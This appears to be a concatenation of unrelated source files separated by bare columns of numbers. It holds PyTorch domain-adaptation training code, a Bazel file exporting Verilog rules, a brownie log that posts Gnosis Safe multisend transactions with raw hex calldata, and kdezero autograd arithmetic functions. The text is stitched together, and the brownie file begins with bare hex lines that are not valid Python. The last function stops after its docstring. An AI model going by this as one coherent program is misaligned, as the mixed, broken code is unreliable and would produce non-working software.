        grid_image = make_grid(torch.from_numpy(pred_src_boundary.detach().cpu().numpy().squeeze(0).squeeze(0)), 3, normalize=True)
        writer.add_image(f'Boundary - {type_}', grid_image, i_iter)
    if boundary_targets is not None:
        grid_image = make_grid(torch.from_numpy(boundary_targets.detach().cpu().numpy().squeeze(0).squeeze(0)), 3,
                               normalize=True)
        writer.add_image(f'BoundaryGT - {type_}', grid_image, i_iter)
def st_draw_in_tensorboard_trans(writer, images, label_trg, i_iter, pred_main, pred_main_swarp, num_classes, type_):
    """Log self-training visualizations to TensorBoard: input images, the main
    and swarped predictions concatenated side-by-side, and the pseudo labels.
    """
    grid_image = make_grid(images[:3].clone().cpu().data, 3, normalize=True)
    writer.add_image(f'Image - {type_}', grid_image, i_iter)
    # Concatenate the main and swarped predictions along the last (width) axis.
    pred_main_cat = torch.cat((pred_main, pred_main_swarp), dim=-1)
    # NOTE(review): F.softmax without dim= is deprecated; dim=1 presumably intended.
    grid_image = make_grid(torch.from_numpy(np.array(colorize_mask(np.asarray(
        np.argmax(F.softmax(pred_main_cat).cpu().data[0].numpy().transpose(1, 2, 0),
                  axis=2), dtype=np.uint8)).convert('RGB')).transpose(2, 0, 1)), 3,
        normalize=False, range=(0, 255))
    writer.add_image(f'Prediction_main_swarp - {type_}', grid_image, i_iter)
    # Colorized pseudo-label map (255 = ignore).
    grid_image = make_grid(torch.from_numpy(np.array(colorize_mask(np.asarray(label_trg.cpu().squeeze(), dtype=np.uint8)).convert('RGB')).transpose(2, 0, 1)), 3,
                           normalize=False, range=(0, 255))
    writer.add_image(f'Labels_IAST - {type_}', grid_image, i_iter)
    # grid_image = make_grid(torch.from_numpy(np.array(colorize_mask(np.asarray(
    #     np.argmax(F.softmax(pred_main_tgt).cpu().data[0].numpy().transpose(1, 2, 0),
    #     axis=2), dtype=np.uint8)).convert('RGB')).transpose(2, 0, 1)), 3,
    #     normalize=False, range=(0, 255))
    # writer.add_image(f'Prediction_swarped - {type_}', grid_image, i_iter)
    # output_sm = F.softmax(pred_main).cpu().data[0].numpy().transpose(1, 2, 0)
    # output_ent = np.sum(-np.multiply(output_sm, np.log2(output_sm)), axis=2,
    #                     keepdims=False)
    # grid_image = make_grid(torch.from_numpy(output_ent), 3, normalize=True,
    #                        range=(0, np.log2(num_classes)))
    # writer.add_image(f'Entropy - {type_}', grid_image, i_iter)
def train_minent(model, trainloader, targetloader, cfg):
    ''' UDA training with minEnt
    '''
    # Minimizes the prediction entropy on (unlabelled) target images while
    # training with cross-entropy on labelled source images.
    # Create the model and start the training.
    input_size_source = cfg.TRAIN.INPUT_SIZE_SOURCE
    input_size_target = cfg.TRAIN.INPUT_SIZE_TARGET
    device = cfg.GPU_ID
    num_classes = cfg.NUM_CLASSES
    viz_tensorboard = os.path.exists(cfg.TRAIN.TENSORBOARD_LOGDIR)
    if viz_tensorboard:
        writer = SummaryWriter(log_dir=cfg.TRAIN.TENSORBOARD_LOGDIR)
    # SEGMNETATION NETWORK
    model.train()
    model.to(device)
    cudnn.benchmark = True
    cudnn.enabled = True
    # OPTIMIZERS
    # segnet's optimizer
    optimizer = optim.SGD(model.optim_parameters(cfg.TRAIN.LEARNING_RATE),
                          lr=cfg.TRAIN.LEARNING_RATE,
                          momentum=cfg.TRAIN.MOMENTUM,
                          weight_decay=cfg.TRAIN.WEIGHT_DECAY)
    # interpolate output segmaps
    interp = nn.Upsample(size=(input_size_source[1], input_size_source[0]), mode='bilinear',
                         align_corners=True)
    interp_target = nn.Upsample(size=(input_size_target[1], input_size_target[0]), mode='bilinear',
                                align_corners=True)
    trainloader_iter = enumerate(trainloader)
    targetloader_iter = enumerate(targetloader)
    for i_iter in tqdm(range(cfg.TRAIN.EARLY_STOP)):
        # reset optimizers
        optimizer.zero_grad()
        # adapt LR if needed
        adjust_learning_rate(optimizer, i_iter, cfg)
        # UDA Training
        # train on source
        _, batch = trainloader_iter.__next__()
        images_source, labels, _, _ = batch
        pred_src_aux, pred_src_main = model(images_source.cuda(device))
        if cfg.TRAIN.MULTI_LEVEL:
            # auxiliary (deep-supervision) head
            pred_src_aux = interp(pred_src_aux)
            loss_seg_src_aux = loss_calc(pred_src_aux, labels, device)
        else:
            loss_seg_src_aux = 0
        pred_src_main = interp(pred_src_main)
        loss_seg_src_main = loss_calc(pred_src_main, labels, device)
        loss = (cfg.TRAIN.LAMBDA_SEG_MAIN * loss_seg_src_main
                + cfg.TRAIN.LAMBDA_SEG_AUX * loss_seg_src_aux)
        loss.backward()
        # adversarial training with minent
        _, batch = targetloader_iter.__next__()
        images, _, _, _ = batch
        pred_trg_aux, pred_trg_main = model(images.cuda(device))
        pred_trg_aux = interp_target(pred_trg_aux)
        pred_trg_main = interp_target(pred_trg_main)
        # NOTE(review): F.softmax without dim= is deprecated; dim=1 presumably intended.
        pred_prob_trg_aux = F.softmax(pred_trg_aux)
        pred_prob_trg_main = F.softmax(pred_trg_main)
        loss_target_entp_aux = entropy_loss(pred_prob_trg_aux)
        loss_target_entp_main = entropy_loss(pred_prob_trg_main)
        loss = (cfg.TRAIN.LAMBDA_ENT_AUX * loss_target_entp_aux
                + cfg.TRAIN.LAMBDA_ENT_MAIN * loss_target_entp_main)
        loss.backward()
        optimizer.step()
        current_losses = {'loss_seg_src_aux': loss_seg_src_aux,
                          'loss_seg_src_main': loss_seg_src_main,
                          'loss_ent_aux': loss_target_entp_aux,
                          'loss_ent_main': loss_target_entp_main}
        print_losses(current_losses, i_iter)
        if i_iter % cfg.TRAIN.SAVE_PRED_EVERY == 0 and i_iter != 0:
            print('taking snapshot ...')
            print('exp =', cfg.TRAIN.SNAPSHOT_DIR)
            torch.save(model.state_dict(),
                       osp.join(cfg.TRAIN.SNAPSHOT_DIR, f'model_{i_iter}.pth'))
            if i_iter >= cfg.TRAIN.EARLY_STOP - 1:
                break
        sys.stdout.flush()
        # Visualize with tensorboard
        if viz_tensorboard:
            log_losses_tensorboard(writer, current_losses, i_iter)
            if i_iter % cfg.TRAIN.TENSORBOARD_VIZRATE == cfg.TRAIN.TENSORBOARD_VIZRATE - 1:
                draw_in_tensorboard(writer, images, i_iter, pred_trg_main, num_classes, 'T')
                draw_in_tensorboard(writer, images_source, i_iter, pred_src_main, num_classes, 'S')
def print_losses(current_losses, i_iter):
    """Pretty-print every loss in *current_losses* for one iteration via tqdm."""
    parts = [f'{name} = {to_numpy(value):.3f} ' for name, value in current_losses.items()]
    tqdm.write(f'iter = {i_iter} {" ".join(parts)}')
def log_losses_tensorboard(writer, current_losses, i_iter):
    """Write every entry of *current_losses* to TensorBoard at step *i_iter*."""
    for name in current_losses:
        writer.add_scalar(f'data/{name}', to_numpy(current_losses[name]), i_iter)
def to_numpy(tensor):
    """Convert a loss value to something printable/loggable.

    Plain Python ints/floats (e.g. a disabled loss weighted as 0) pass
    through unchanged; torch tensors are detached from the autograd graph,
    moved to the CPU and converted to a NumPy array.
    """
    if isinstance(tensor, (int, float)):
        return tensor
    # .detach() replaces the legacy .data attribute access.
    return tensor.detach().cpu().numpy()
def train_domain_adaptation(model, trainloader, targetloader, cfg):
    """Dispatch to the training routine selected by
    cfg.TRAIN.{MODEL, DA_METHOD, OCDA_METHOD[, OPTION]}."""
    model_name = cfg.TRAIN.MODEL
    da_method = cfg.TRAIN.DA_METHOD
    ocda_method = cfg.TRAIN.OCDA_METHOD
    boundary_methods = ('boundary', 'ad_boundary', 'attn_boundary')
    if model_name == 'DeepLabv2':
        if da_method == 'MinEnt':
            train_minent(model, trainloader, targetloader, cfg)
        elif da_method == 'AdvEnt':
            train_advent(model, trainloader, targetloader, cfg)
    elif model_name == 'DeepLabv2_VGG':
        if da_method == 'source_only':
            if ocda_method == 'baseline':
                train_vgg(model, trainloader, targetloader, cfg)
            elif ocda_method in boundary_methods:
                train_Boundary_vgg(model, trainloader, targetloader, cfg)
            elif ocda_method in ('selfTrain', 'selfTrain_boundary'):
                train_IST_vgg(model, trainloader, targetloader, cfg)
        elif da_method in ('AdapSeg', 'AdvEnt'):
            if ocda_method == 'baseline':
                train_advent_vgg(model, trainloader, targetloader, cfg)
            elif ocda_method in boundary_methods:
                # The discriminator layout is chosen by cfg.TRAIN.OPTION.
                option = cfg.TRAIN.OPTION
                if option == 'twinD':
                    train_Boundary_advent_vgg(model, trainloader, targetloader, cfg)
                elif option == 'segOnlyD':
                    train_ad_Boundary_advent_vgg(model, trainloader, targetloader, cfg)
                elif option == 'catOutD':
                    train_cat_Boundary_advent_vgg(model, trainloader, targetloader, cfg)
            elif ocda_method == 'selfTrain':
                train_IST_vgg(model, trainloader, targetloader, cfg)
            else:
                raise NotImplementedError(
                    f"Not yet supported !OCDA! method {cfg.TRAIN.MODEL}_{cfg.TRAIN.DA_METHOD}_{cfg.TRAIN.OCDA_METHOD}")
    else:
        raise NotImplementedError(f"Not yet supported !DA! method {cfg.TRAIN.MODEL}_{cfg.TRAIN.DA_METHOD}_{cfg.TRAIN.OCDA_METHOD}")
| 42.702895
| 162
| 0.625906
| 9,959
| 78,189
| 4.527262
| 0.039562
| 0.045956
| 0.020982
| 0.01018
| 0.923282
| 0.908444
| 0.895047
| 0.879899
| 0.86617
| 0.85559
| 0
| 0.009087
| 0.262531
| 78,189
| 1,830
| 163
| 42.72623
| 0.772831
| 0.181432
| 0
| 0.787335
| 0
| 0.00189
| 0.039619
| 0.011105
| 0
| 0
| 0
| 0.005464
| 0
| 1
| 0.017013
| false
| 0
| 0.021739
| 0
| 0.042533
| 0.030246
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e250df6cd8010f5e79b7224d76f5e0ab451f0458
| 1,283
|
bzl
|
Python
|
verilog/defs.bzl
|
justin371/rules_verilog
|
e10ec0348a44e3ea95035bd876cc6961b836dfaa
|
[
"Apache-2.0"
] | null | null | null |
verilog/defs.bzl
|
justin371/rules_verilog
|
e10ec0348a44e3ea95035bd876cc6961b836dfaa
|
[
"Apache-2.0"
] | null | null | null |
verilog/defs.bzl
|
justin371/rules_verilog
|
e10ec0348a44e3ea95035bd876cc6961b836dfaa
|
[
"Apache-2.0"
] | null | null | null |
"""Public entry point to all supported Verilog rules and APIs"""
load(
"//verilog/private:verilog.bzl",
_verilog_test = "verilog_test",
_verilog_tool_encapsulation = "verilog_tool_encapsulation",
)
load(
"//verilog/private:rtl.bzl",
_verilog_rtl_cdc_test = "verilog_rtl_cdc_test",
_verilog_rtl_library = "verilog_rtl_library",
_verilog_rtl_lint_test = "verilog_rtl_lint_test",
_verilog_rtl_pkg = "verilog_rtl_pkg",
_verilog_rtl_shell = "verilog_rtl_shell",
_verilog_rtl_unit_test = "verilog_rtl_unit_test",
)
load(
"//verilog/private:dv.bzl",
_verilog_dv_library = "verilog_dv_library",
_verilog_dv_tb = "verilog_dv_tb",
_verilog_dv_test_cfg = "verilog_dv_test_cfg",
_verilog_dv_unit_test = "verilog_dv_unit_test",
)
verilog_tool_encapsulation = _verilog_tool_encapsulation
verilog_test = _verilog_test
verilog_rtl_cdc_test = _verilog_rtl_cdc_test
verilog_rtl_library = _verilog_rtl_library
verilog_rtl_lint_test = _verilog_rtl_lint_test
verilog_rtl_pkg = _verilog_rtl_pkg
verilog_rtl_shell = _verilog_rtl_shell
verilog_rtl_unit_test = _verilog_rtl_unit_test
verilog_dv_library = _verilog_dv_library
verilog_dv_tb = _verilog_dv_tb
verilog_dv_test_cfg = _verilog_dv_test_cfg
verilog_dv_unit_test = _verilog_dv_unit_test
| 32.897436
| 64
| 0.804365
| 185
| 1,283
| 4.843243
| 0.140541
| 0.267857
| 0.171875
| 0.075893
| 0.861607
| 0.821429
| 0.821429
| 0.705357
| 0.705357
| 0.705357
| 0
| 0
| 0.120811
| 1,283
| 38
| 65
| 33.763158
| 0.794326
| 0.045207
| 0
| 0.090909
| 0
| 0
| 0.245283
| 0.11977
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e2b283bd1f7ac114c75f0fa738a71eb5eeb7dd1e
| 13,387
|
py
|
Python
|
brownie/runlogs/2021_12_strategist.py
|
pedrotmr/origin-dollar
|
6695cd5569f7f11ad7261bbd2903ba18979d683a
|
[
"MIT"
] | null | null | null |
brownie/runlogs/2021_12_strategist.py
|
pedrotmr/origin-dollar
|
6695cd5569f7f11ad7261bbd2903ba18979d683a
|
[
"MIT"
] | null | null | null |
brownie/runlogs/2021_12_strategist.py
|
pedrotmr/origin-dollar
|
6695cd5569f7f11ad7261bbd2903ba18979d683a
|
[
"MIT"
] | 1
|
2022-03-27T09:29:21.000Z
|
2022-03-27T09:29:21.000Z
|
0x8d80ff0a0000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000022b005b98b3255522e95f842967723ee4cc7dceaa915000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004b3d3d37e00e75d77b1865ae93c7eaa3040b038d7aa7bc02f70000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001047fe2d3930000000000000000000000009c459eeb3fa179a40329b81c1635525e9a0ef094000000000000000000000000ea2ef2e2e5a749d4a66b41db9ad85a38aa264cb3000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000000000001000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb480000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000174876e800005b98b3255522e95f842967723ee4cc7dceaa9150000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000242cd47c230000000000000000000000000000000000000000000000056bc75e2d63100000000000000000000000000000000000000000000000
0x8d80ff0a 005b98b3255522e95f842967723ee4cc7dceaa915000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004b3d3d37e00e75d77b1865ae93c7eaa3040b038d7aa7bc02f70000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001047fe2d3930000000000000000000000009c459eeb3fa179a40329b81c1635525e9a0ef094000000000000000000000000ea2ef2e2e5a749d4a66b41db9ad85a38aa264cb3000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000000000001000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb480000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000174876e800005b98b3255522e95f842967723ee4cc7dceaa9150000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000242cd47c230000000000000000000000000000000000000000000000056bc75e2d63100000
#1
from world import *
from ape_safe import ApeSafe
safe = ApeSafe('0xF14BBdf064E3F67f51cd9BD646aE3716aD938FDC')
show_vault_holdings()
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0xb3d3d37e')
strategist.transfer(to=vault_core, data='0x7fe2d3930000000000000000000000009c459eeb3fa179a40329b81c1635525e9a0ef094000000000000000000000000ea2ef2e2e5a749d4a66b41db9ad85a38aa264cb3000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000000000001000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb480000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000174876e800')
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0x2cd47c2300000000000000000000000000000000000000000000000ad78ebc5ac6200000')
show_vault_holdings()
safe_tx = safe.multisend_from_receipts([history[-3], history[-2], history[-1]], safe_nonce=51)
safe.sign_with_frame(safe_tx)
safe.post_transaction(safe_tx)
#2
from world import *
from ape_safe import ApeSafe
safe = ApeSafe('0xF14BBdf064E3F67f51cd9BD646aE3716aD938FDC')
show_vault_holdings()
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0xb3d3d37e')
strategist.transfer(to=vault_core, data='0x7fe2d3930000000000000000000000009c459eeb3fa179a40329b81c1635525e9a0ef094000000000000000000000000ea2ef2e2e5a749d4a66b41db9ad85a38aa264cb3000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000000000001000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb480000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000174876e800')
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0x2cd47c23ffffffffffffffffffffffffffffffffffffffffffffffe4e51b291d10b00000')
show_vault_holdings()
safe_tx = safe.multisend_from_receipts([history[-3], history[-2], history[-1]], safe_nonce=54)
safe.sign_with_frame(safe_tx)
safe.post_transaction(safe_tx)
#3
from world import *
from ape_safe import ApeSafe
safe = ApeSafe('0xF14BBdf064E3F67f51cd9BD646aE3716aD938FDC')
show_vault_holdings()
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0xb3d3d37e')
strategist.transfer(to=vault_core, data='0x7fe2d3930000000000000000000000009c459eeb3fa179a40329b81c1635525e9a0ef094000000000000000000000000ea2ef2e2e5a749d4a66b41db9ad85a38aa264cb3000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000000000001000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb480000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000009184e72a000')
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0x2cd47c230000000000000000000000000000000000000000000000a2a15d09519be00000')
show_vault_holdings()
safe_tx = safe.multisend_from_receipts([history[-3], history[-2], history[-1]], safe_nonce=55)
safe.sign_with_frame(safe_tx)
safe.post_transaction(safe_tx)
#4
from world import *
from ape_safe import ApeSafe
safe = ApeSafe('0xF14BBdf064E3F67f51cd9BD646aE3716aD938FDC')
show_vault_holdings()
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0xb3d3d37e')
strategist.transfer(to=vault_core, data='0x7fe2d3930000000000000000000000009c459eeb3fa179a40329b81c1635525e9a0ef094000000000000000000000000ea2ef2e2e5a749d4a66b41db9ad85a38aa264cb3000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000000000001000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb480000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000012309ce54000')
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0x2cd47c2300000000000000000000000000000000000000000000014542ba12a337c00000')
show_vault_holdings()
safe_tx = safe.multisend_from_receipts([history[-3], history[-2], history[-1]], safe_nonce=56)
safe.sign_with_frame(safe_tx)
safe.post_transaction(safe_tx)
#5
from world import *
from ape_safe import ApeSafe
safe = ApeSafe('0xF14BBdf064E3F67f51cd9BD646aE3716aD938FDC')
show_vault_holdings()
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0xb3d3d37e')
strategist.transfer(to=vault_core, data='0x7fe2d3930000000000000000000000009c459eeb3fa179a40329b81c1635525e9a0ef094000000000000000000000000ea2ef2e2e5a749d4a66b41db9ad85a38aa264cb3000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000000000001000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb48000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000001b48eb57e000')
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0x2cd47c230000000000000000000000000000000000000000000001e7e4171bf4d3a00000')
show_vault_holdings()
safe_tx = safe.multisend_from_receipts([history[-3], history[-2], history[-1]], safe_nonce=57)
safe.sign_with_frame(safe_tx)
safe.post_transaction(safe_tx)
#6
from world import *
from ape_safe import ApeSafe
safe = ApeSafe('0xF14BBdf064E3F67f51cd9BD646aE3716aD938FDC')
show_vault_holdings()
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0xb3d3d37e')
# NOTE(review): transcript of one-off brownie console sessions that build,
# sign and post Gnosis Safe multisend transactions. The hex `data` payloads
# are pre-encoded ABI calldata; their selectors cannot be decoded from this
# file alone — presumably vault fund-reallocation calls, TODO confirm.
# Tail of a previous batch (its opening transfers are above this chunk):
strategist.transfer(to=vault_core, data='0x7fe2d3930000000000000000000000009c459eeb3fa179a40329b81c1635525e9a0ef094000000000000000000000000ea2ef2e2e5a749d4a66b41db9ad85a38aa264cb3000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000000000001000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb48000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000002d79883d2000')
# 0x2cd47c23 takes one uint256 — presumably the max-loss bound quoted in the
# notes below; TODO confirm selector against the helper contract's ABI.
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0x2cd47c2300000000000000000000000000000000000000000000032d26d12e980b600000')
show_vault_holdings()
# Bundle the last three console receipts into one Safe multisend at nonce 58.
safe_tx = safe.multisend_from_receipts([history[-3], history[-2], history[-1]], safe_nonce=58)
safe.sign_with_frame(safe_tx)
safe.post_transaction(safe_tx)
# --------------------------------
# DEC 24, 2021
#
# I'm thinking of batching this into three transactions. We can run one per day (Sat, Sun, Mon):
# 1. Move 17.4 million DAI from AAVE.
# 2. Move 12.5 million DAI and 15.7 million USDC from Compound
# 3. Move 28.1 million USDC from Compound
# 17.4 + (12.5 + 15.7) + 28.1 = 73.7
# 1. Move 17.4 million DAI from AAVE to Convex
# Targeting 4570 loss. 5600 max loss
from world import *
from ape_safe import ApeSafe
safe = ApeSafe('0xF14BBdf064E3F67f51cd9BD646aE3716aD938FDC')
show_vault_holdings()
# 0xb3d3d37e: no-argument call on the helper contract — TODO confirm selector.
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0xb3d3d37e')
strategist.transfer(to=vault_core, data='0x7fe2d3930000000000000000000000005e3646a1db86993f73e6b74a57d8640b69f7e259000000000000000000000000ea2ef2e2e5a749d4a66b41db9ad85a38aa264cb3000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c000000000000000000000000000000000000000000000000000000000000000010000000000000000000000006b175474e89094c44da98b954eedeac495271d0f00000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000e6497e3db20f38b000000')
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0x2cd47c2300000000000000000000000000000000000000000000012f939c99edab800000')
show_vault_holdings()
# Batch 1 posted at Safe nonce 61.
safe_tx = safe.multisend_from_receipts([history[-3], history[-2], history[-1]], safe_nonce=61)
safe.sign_with_frame(safe_tx)
r = safe.post_transaction(safe_tx)
# 2. Move 12.5 million DAI and 15.7 million USDC from Compound
# Targeting 4458 loss. 5600 max loss
from world import *
from ape_safe import ApeSafe
safe = ApeSafe('0xF14BBdf064E3F67f51cd9BD646aE3716aD938FDC')
show_vault_holdings()
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0xb3d3d37e')
strategist.transfer(to=vault_core, data='0x7fe2d3930000000000000000000000009c459eeb3fa179a40329b81c1635525e9a0ef094000000000000000000000000ea2ef2e2e5a749d4a66b41db9ad85a38aa264cb3000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000e000000000000000000000000000000000000000000000000000000000000000020000000000000000000000006b175474e89094c44da98b954eedeac495271d0f000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4800000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000a56fa5b99019a5c80000000000000000000000000000000000000000000000000000000000e4770ec4800')
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0x2cd47c2300000000000000000000000000000000000000000000012f939c99edab800000')
show_vault_holdings()
# Batch 2 posted at Safe nonce 62.
safe_tx = safe.multisend_from_receipts([history[-3], history[-2], history[-1]], safe_nonce=62)
safe.sign_with_frame(safe_tx)
r = safe.post_transaction(safe_tx)
# 3. Move 28.1 million USDC from Compound
# Targeting: 6795, max loss: 7800
from world import *
from ape_safe import ApeSafe
safe = ApeSafe('0xF14BBdf064E3F67f51cd9BD646aE3716aD938FDC')
show_vault_holdings()
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0xb3d3d37e')
strategist.transfer(to=vault_core, data='0x7fe2d3930000000000000000000000009c459eeb3fa179a40329b81c1635525e9a0ef094000000000000000000000000ea2ef2e2e5a749d4a66b41db9ad85a38aa264cb3000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000000000001000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4800000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000198e8a84a800')
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0x2cd47c230000000000000000000000000000000000000000000001a6d6beb1d42ee00000')
show_vault_holdings()
# Batch 3 posted at Safe nonce 63.
safe_tx = safe.multisend_from_receipts([history[-3], history[-2], history[-1]], safe_nonce=63)
safe.sign_with_frame(safe_tx)
r = safe.post_transaction(safe_tx)
| 76.0625
| 1,290
| 0.90924
| 678
| 13,387
| 17.753687
| 0.154867
| 0.040376
| 0.044862
| 0.092714
| 0.429509
| 0.400598
| 0.400432
| 0.400432
| 0.390961
| 0.390961
| 0
| 0.616458
| 0.041383
| 13,387
| 176
| 1,291
| 76.0625
| 0.321515
| 0.042504
| 0
| 0.752475
| 0
| 0
| 0.524728
| 0.517697
| 0
| 1
| 0.626299
| 0
| 0
| 0
| null | null | 0
| 0.178218
| null | null | 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| null | 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
e2c3fcad137cf82b70d30ea2db27be8a866c1f2a
| 2,655
|
py
|
Python
|
kdezero/functions/basic_calc_functions.py
|
kotabrog/K_DeZero
|
e8145a539874956bc235d4577fa38211c01c30ea
|
[
"MIT"
] | null | null | null |
kdezero/functions/basic_calc_functions.py
|
kotabrog/K_DeZero
|
e8145a539874956bc235d4577fa38211c01c30ea
|
[
"MIT"
] | null | null | null |
kdezero/functions/basic_calc_functions.py
|
kotabrog/K_DeZero
|
e8145a539874956bc235d4577fa38211c01c30ea
|
[
"MIT"
] | null | null | null |
import kdezero
from kdezero import Function
from kdezero import as_array
class Add(Function):
    """Element-wise addition with broadcasting-aware backward."""

    def forward(self, x0, x1):
        # Remember input shapes so backward can undo broadcasting.
        self.x0_shape, self.x1_shape = x0.shape, x1.shape
        return x0 + x1

    def backward(self, gy):
        grad0, grad1 = gy, gy
        if self.x0_shape != self.x1_shape:
            # Inputs were broadcast; reduce gradients back to input shapes.
            grad0 = kdezero.functions.sum_to(grad0, self.x0_shape)
            grad1 = kdezero.functions.sum_to(grad1, self.x1_shape)
        return grad0, grad1
def add(x0, x1):
    """Add two values, coercing x1 to an ndarray on x0's device."""
    xp = kdezero.cuda.get_array_module(x0.data)
    return Add()(x0, as_array(x1, xp))
class Mul(Function):
    """Element-wise multiplication with broadcasting-aware backward."""

    def forward(self, x0, x1):
        return x0 * x1

    def backward(self, gy):
        a, b = self.inputs
        grad_a = gy * b
        grad_b = gy * a
        if a.shape != b.shape:
            # Undo broadcasting by summing gradients down to input shapes.
            grad_a = kdezero.functions.sum_to(grad_a, a.shape)
            grad_b = kdezero.functions.sum_to(grad_b, b.shape)
        return grad_a, grad_b
def mul(x0, x1):
    """Multiply two values, coercing x1 to an ndarray on x0's device."""
    xp = kdezero.cuda.get_array_module(x0.data)
    return Mul()(x0, as_array(x1, xp))
class Neg(Function):
    """Element-wise negation: y = -x."""
    def forward(self, x):
        return -x
    def backward(self, gy):
        # d(-x)/dx = -1, so the upstream gradient is simply negated.
        return -gy
def neg(x):
    """Return the element-wise negation of x."""
    return Neg()(x)
class Sub(Function):
    """Element-wise subtraction with broadcasting-aware backward."""

    def forward(self, x0, x1):
        # Save input shapes so backward can undo broadcasting.
        self.x0_shape, self.x1_shape = x0.shape, x1.shape
        return x0 - x1

    def backward(self, gy):
        grad0, grad1 = gy, -gy
        if self.x0_shape != self.x1_shape:
            grad0 = kdezero.functions.sum_to(grad0, self.x0_shape)
            grad1 = kdezero.functions.sum_to(grad1, self.x1_shape)
        return grad0, grad1
def sub(x0, x1):
    """Subtract x1 from x0, coercing x1 onto x0's device."""
